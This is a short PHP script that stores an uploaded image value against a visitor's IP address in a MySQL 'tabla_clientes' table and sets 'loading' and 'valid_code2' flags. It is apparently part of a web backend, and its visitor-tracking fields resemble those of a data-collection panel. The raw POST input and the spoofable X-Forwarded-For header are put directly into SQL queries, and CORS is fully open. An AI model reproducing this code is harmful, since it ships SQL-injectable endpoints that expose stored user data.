<?php
header('content-type: application/json; charset=utf-8');
//en caso de json en vez de jsonp habría que habilitar CORS:
header("access-control-allow-origin: *");


date_default_timezone_set("America/Caracas");
$fecha_actual=strftime( "%Y-%m-%d %H:%M:%S", time());

require('../medicina/php/config/conexion.php');

function obtenerIPCliente() {
    if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        // Si existe el encabezado HTTP_X_FORWARDED_FOR, tomamos la primera IP de la lista
        $ip = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR'])[0];
    } else {
        // Si no existe, usamos REMOTE_ADDR
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    return $ip;
}

$ip_user = obtenerIPCliente();
$img = $_POST['img'];



function convertirFechaHoraNumerico($fechaHora) {
    // Convertir la fecha y hora en formato %Y-%m-%d %H:%M:%S a formato numérico YmdHis
    $fechaNumerica = str_replace(['-', ' ', ':'], '', $fechaHora);
    return $fechaNumerica;
}


$tiempo_actual = convertirFechaHoraNumerico($fecha_actual);
$numeroAleatorio = mt_rand(1, 100);



          $consulta2 = "SELECT * FROM tabla_clientes where ip ='$ip_user'";
          $resultado2 = mysqli_query( $conexion, $consulta2 ) or die ( "Algo ha ido mal en la consulta a la base de datos");

             if (mysqli_num_rows($resultado2)>0){

                     
                      if(mysqli_query($conexion,"UPDATE tabla_clientes SET tiempo = '$tiempo_actual',valid_code2 = '0',loading = '1',img1='$img' where ip = '$ip_user'")){


                          $arr[] = array('guardo' => 'si','time' => $tiempo_actual,'img' => $img);


                          echo '' . json_encode($arr) . '';
                          return;
                      }else{

                           $arr[] = array('guardo' => 'no');

                           echo '' . json_encode($arr) . '';
                           return;

                      }

             }else{
                   $arr[] = array('guardo' => 'no');

                           echo '' . json_encode($arr) . '';
                           return;

             }






